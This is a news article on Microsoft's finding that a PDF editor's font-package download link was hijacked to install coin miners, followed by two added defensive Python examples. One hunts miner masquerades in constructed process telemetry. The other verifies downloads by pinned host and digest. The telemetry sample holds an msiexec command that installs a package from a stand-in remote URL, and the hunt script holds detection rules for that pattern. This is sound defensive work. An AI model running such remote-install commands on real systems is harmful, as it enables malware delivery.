It appears that the recent spate of state-backed supply chain attacks, such as the costly NotPetya attack spread through the software of a Ukrainian accounting firm, has inspired low-level cybercriminals to use the same tactics to spread malware at scale.
Microsoft’s Windows Defender Research team has outlined an “unusual” attack that exploited shared systems between an unnamed PDF editor application maker and one of its software partners, which supplied fonts. The trick the attackers used made the legitimate app’s installer deliver malicious files that installed multiple cryptocurrency miners, one of today’s favorite illicit money-makers.
Microsoft believes the supply chain was corrupted for three months, between January and March 2018, but notes the attack was “limited in nature”.
Despite its narrow impact, Microsoft is worried that more supply chain attacks are on the way and that cryptocurrency remains a major means of monetizing malware campaigns.
Microsoft highlights that this attack did not appear to involve state-backed or sophisticated hackers but rather “petty cybercriminals” trying to make a quick buck off other people’s CPUs. The overall warning is that the supply chain is becoming a popular attack technique among cybercriminals.
Microsoft’s threat hunters began probing the issue when similar infection patterns started emerging across different sets of machines. Its antivirus was detecting and blocking a coin-mining process masquerading as pagefile.sys, which was being launched by a service named xbox-service.exe. Windows Defender ATP’s alert timeline showed that xbox-service.exe had been installed by an installer package that was automatically downloaded from a suspicious remote server, the Windows Defender team wrote.
Windows security researchers initially had no answers for how the xbox-service.exe and pagefile.sys files got onto the host, why xbox-service.exe was being launched with high privileges, and what network and process activity preceded its launch.
They later determined that it was a software supply chain attack after detecting a malicious MSI file (an installer package, stored as a database file read by Windows Installer) that was secretly installed as part of an Asian font package.
The key advantage of concealing malware in installer programs is that installers typically run with elevated system privileges, which lets the payload freely take dangerous actions such as running coin miners, Microsoft notes.
Microsoft, working with the affected PDF editor vendor, found that the vendor itself had not been attacked, but that it depended on another software vendor that created and distributed the font packages used by the app. This discovery allowed all parties to close off the attack vector.
What Microsoft is concerned about is that cybercriminals are learning from the sophisticated attackers that have used supply chain attacks in the past. And because the attack went through a second-tier supplier rather than the app vendor itself, any other vendor relying on that same supplier could have been exposed as well.
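Turning the alert chain described above into hunting logic, as an added example that is not part of the article or of Microsoft’s own detection code: the script below walks constructed process-creation events (the fields loosely mirror Sysmon event ID 1; the pids, paths, user names and the msiexec-from-URL command line are assumptions, not telemetry from the case) and flags any process whose image carries a data-file extension such as .sys, plus any msiexec.exe launched directly against a remote URL. For each hit it prints the parent chain back to the root, so an analyst sees the installer-to-miner lineage at a glance.

```python
"""Hunt for a coin miner masquerading as pagefile.sys in process-creation events.

Example code added for this page; it is not Microsoft's detection logic and the
events below are constructed, not real telemetry. Fields loosely mirror Sysmon
event ID 1 (ProcessCreate). ntpath is used so Windows paths parse on any OS.
"""
from collections import namedtuple
import ntpath

Event = namedtuple("Event", "pid ppid image cmdline user")

# Constructed sample events modelled on the chain described in the article:
# app installer -> msiexec on a remote MSI -> xbox-service.exe -> "pagefile.sys".
# Assumed detail: the package was pulled with msiexec /i <URL>.
SAMPLE_EVENTS = [
    Event(400, 1, r"C:\Windows\System32\services.exe", "services.exe", r"NT AUTHORITY\SYSTEM"),
    Event(1200, 4000, r"C:\Program Files\PdfApp\setup.exe", "setup.exe /quiet", r"CORP\alice"),
    Event(1310, 1200, r"C:\Windows\System32\msiexec.exe",
          'msiexec.exe /i "http://fonts-mirror.example/asian-fonts.msi" /qn', r"CORP\alice"),
    Event(1500, 400, r"C:\Windows\System32\xbox-service.exe", "xbox-service.exe", r"NT AUTHORITY\SYSTEM"),
    Event(1622, 1500, r"C:\Windows\pagefile.sys", "pagefile.sys -o pool.example:3333", r"NT AUTHORITY\SYSTEM"),
    Event(2001, 4000, r"C:\Windows\System32\notepad.exe", "notepad.exe", r"CORP\alice"),
]

# Extensions that never belong to a process image: a running process whose image
# path ends in one of these is a masquerade (the real pagefile.sys is data, not code).
NON_EXECUTABLE_EXTENSIONS = {".sys", ".dat", ".db", ".log", ".tmp"}


def image_masquerades_as_data(image):
    return ntpath.splitext(image.lower())[1] in NON_EXECUTABLE_EXTENSIONS


def msiexec_with_remote_source(ev):
    """msiexec can install straight from a URL; flag that, since a package that
    never touched disk as a vetted file is exactly what a hijacked link delivers."""
    base = ntpath.basename(ev.image).lower()
    cmd = ev.cmdline.lower()
    return base == "msiexec.exe" and ("http://" in cmd or "https://" in cmd)


def ancestry(events, pid):
    """Return the event for pid followed by its parents, child first, until the
    chain leaves the captured events (or loops)."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def hunt(events):
    """Return one finding per suspicious event: (reason, event, ancestry basenames)."""
    findings = []
    for ev in events:
        reason = None
        if image_masquerades_as_data(ev.image):
            reason = "process image has a data-file extension"
        elif msiexec_with_remote_source(ev):
            reason = "msiexec installing from a remote URL"
        if reason:
            chain = [ntpath.basename(e.image) for e in ancestry(events, ev.pid)]
            findings.append((reason, ev, chain))
    return findings


if __name__ == "__main__":
    for reason, ev, chain in hunt(SAMPLE_EVENTS):
        print(f"[{reason}] pid={ev.pid} user={ev.user} chain={' <- '.join(chain)}")
```

On the sample data the miner is reported as pagefile.sys <- xbox-service.exe <- services.exe running as SYSTEM, which is the privilege problem the researchers noted: the service was installed by an elevated installer, so everything it launches inherits that level. The extension rule is deliberately generic; pagefile.sys is one instance of a broader pattern of code hiding behind data-file names.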
“The attack required a certain level of reconnaissance: the attackers had to understand how the normal installation worked. They eventually found an unspecified weakness in the interactions between the app vendor and partner vendor that created an opportunity.
“The attackers figured out a way to hijack the installation chain of the MSI font packages by exploiting the weakness they found in the infrastructure. Thus, even if the app vendor was not compromised and was completely unaware of the situation, the app became the unexpected carrier of the malicious payload because the attackers were able to redirect downloads.”
The attack did not appear to involve a man-in-the-middle attack or a DNS hijack; the attackers were nonetheless able to change what the app downloaded by pointing its download link at a server they controlled.
“As a result, for a limited period, the link used by the app to download MSI font packages pointed to a domain name registered with a Ukrainian registrar in 2015 and pointing to a server hosted on a popular cloud platform provider. The app installer from the app vendor, still legitimate and not compromised, followed the hijacked links to the attackers’ replica server instead of the software partner’s server,” explained Microsoft’s malware researchers.
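The hijack described above worked because the installer trusted wherever the link pointed. The added example below, which is not the affected vendor’s installer and not code from the article, shows the two checks that would have stopped it: the installer pins the partner host it expects and the SHA-256 of each component it is prepared to run, so a package served from a look-alike domain is rejected on the host check, and a trojaned package served from the right host (the case a host check alone cannot catch) is rejected on the digest check. Hostnames, digests, the in-memory “servers” and the MSI byte strings are constructed stand-ins.

```python
"""Pin what a downloaded installer component must be, not just where it comes from.

Example code added for this page, not the affected vendor's installer. Servers,
hostnames, digests and MSI bytes are constructed stand-ins. The point: a hijacked
download link yields a package whose host or digest does not match the pinned
values, so it is rejected before msiexec ever sees it.
"""
import hashlib
from urllib.parse import urlparse


class ComponentVerificationError(Exception):
    pass


# Constructed stand-ins for the partner's genuine font package and the attacker's
# replica of it (same filename, different contents).
GENUINE_MSI = b"MSI-FONTPACK-v1.0 legit bytes"
TROJANED_MSI = b"MSI-FONTPACK-v1.0 legit bytes + miner dropper"

# What the app vendor ships inside its own signed installer: the partner host it
# expects and the SHA-256 of each component it will run. Changing a link on a
# server cannot alter these; only a new vendor release can.
EXPECTED_HOST = "fonts.partner.example"
PINNED_DIGESTS = {
    "asian-fonts.msi": hashlib.sha256(GENUINE_MSI).hexdigest(),
}

# In-memory "internet": URL -> bytes. The second entry models the hijacked link
# from the article: a replica server under a look-alike domain.
FAKE_SERVERS = {
    "https://fonts.partner.example/asian-fonts.msi": GENUINE_MSI,
    "https://fonts-partner.example/asian-fonts.msi": TROJANED_MSI,
}


def fetch(url):
    """Stand-in for an HTTP GET against the constructed servers above."""
    try:
        return FAKE_SERVERS[url]
    except KeyError:
        raise ComponentVerificationError(f"no such server: {url}")


def download_component(url, fetcher=fetch):
    """Fetch a component; return its bytes only if host and digest both check out."""
    parsed = urlparse(url)
    name = parsed.path.rsplit("/", 1)[-1]
    # Check 1: the link must still point at the partner, over TLS.
    if parsed.scheme != "https" or parsed.hostname != EXPECTED_HOST:
        raise ComponentVerificationError(f"unexpected download host: {parsed.hostname}")
    if name not in PINNED_DIGESTS:
        raise ComponentVerificationError(f"no pinned digest for {name}")
    data = fetcher(url)
    # Check 2: the bytes must be the ones the vendor vetted, whatever server sent them.
    actual = hashlib.sha256(data).hexdigest()
    if actual != PINNED_DIGESTS[name]:
        raise ComponentVerificationError(f"digest mismatch for {name}: {actual[:16]}...")
    return data


def try_download(url, fetcher=fetch):
    """Convenience wrapper returning (accepted, message) instead of raising."""
    try:
        download_component(url, fetcher)
        return True, "ok"
    except ComponentVerificationError as exc:
        return False, str(exc)


if __name__ == "__main__":
    print(try_download("https://fonts.partner.example/asian-fonts.msi"))
    print(try_download("https://fonts-partner.example/asian-fonts.msi"))
    # Partner host itself serving a trojaned file: host check passes, digest fails.
    print(try_download("https://fonts.partner.example/asian-fonts.msi",
                       fetcher=lambda u: TROJANED_MSI))
```

The trade-off is that a pinned digest ties each font package to a specific app release, so a partner update needs a vendor rebuild. On Windows the usual alternative is to require a valid Authenticode signature from the partner’s code-signing certificate on the downloaded MSI (for instance with PowerShell’s Get-AuthenticodeSignature) before handing it to msiexec; that still defeats a replica server, while letting the partner ship new packages without a vendor release.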
Microsoft also found that the payload tries to stop the infected machine from communicating with the update servers of PDF applications and security software, which would keep it from being detected and removed.
The attackers also had plans to use Coinhive at some point so that infected machines would start mining Monero through their browsers.
Supply chain attacks have been rare over the past six years: only one was discovered in 2011. By 2016 four had been discovered, and the count jumped to seven in 2017, among them the NotPetya attack, the backdoored version of Avast’s CCleaner, and an attack on a BitTorrent client.
Microsoft concedes that its own efforts to harden Windows 10 against the more common browser, application and operating system attacks may be partly to blame for the rise in supply chain attacks, by forcing attackers to look for easier and cheaper ways to compromise machines.
On the flip side, the advantage of a supply chain attack, from the attacker’s point of view, is that it can reach a large number of users in a short amount of time. It also takes advantage of the interdependencies that have come to typify a software industry that relies on partners and often shares vulnerable code.